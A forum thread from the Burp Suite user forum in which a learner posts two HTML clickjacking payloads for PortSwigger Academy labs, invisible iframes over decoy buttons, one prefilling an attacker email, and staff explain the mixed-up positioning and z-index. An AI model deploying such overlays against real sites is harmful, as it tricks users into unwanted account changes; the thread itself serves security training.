Burp Suite User Forum


Clickjacking labs are not getting solved

MrNobody | Last updated: Feb 27, 2023 03:49PM UTC

I am trying to solve the clickjacking lab from PortSwigger Academy. I have made all the alignments according to the lab but still, it is not solved.

LAB #1: Basic clickjacking with CSRF token protection

```html
<style>
    iframe {
        position: absolute;
        width: 1500px;
        height: 1500px;
        opacity: 0.001;
        z-index: 2;
    }
    div {
        position: relative;
        left: 200px;
        top: 560px;
        z-index: 1;
        padding: 20px 40px;
    }
</style>
<div>click</div>
<iframe src="https://MY-LAB-ID.web-security-academy.net/my-account"></iframe>
```

LAB #2: Clickjacking with form input data prefilled from a URL parameter

```html
<style>
    iframe {
        position: absolute;
        height: 1300px;
        width: 1300px;
        opacity: 0.001;
        z-index: 1;
    }
    div {
        position: relative;
        top: 500px;
        left: 125px;
        z-index: 2;
    }
</style>
<div>Click me</div>
<iframe src="https://MY-LAB-ID.web-security-academy.net/my-account?email=youare@hacked.com"></iframe>
```

Please help me with that.

PS: Yes, I have put my lab ID in place of 'MY-LAB-ID'.

MrNobody | Last updated: Feb 27, 2023 04:00PM UTC

One thing I noticed is that when I hover over the Div tag element, the cursor is not changing to the link cursor.

Ben, PortSwigger Agent | Last updated: Feb 28, 2023 09:47AM UTC

Hi,

For both of these labs, it looks like you have mixed up the position attribute (the iframe needs to be relative and the div element needs to be absolute).

For the 'Clickjacking with form input data prefilled from a URL parameter' lab you have also mixed up the z-index parameters - the iframe should be 2 and the div element should be 1.
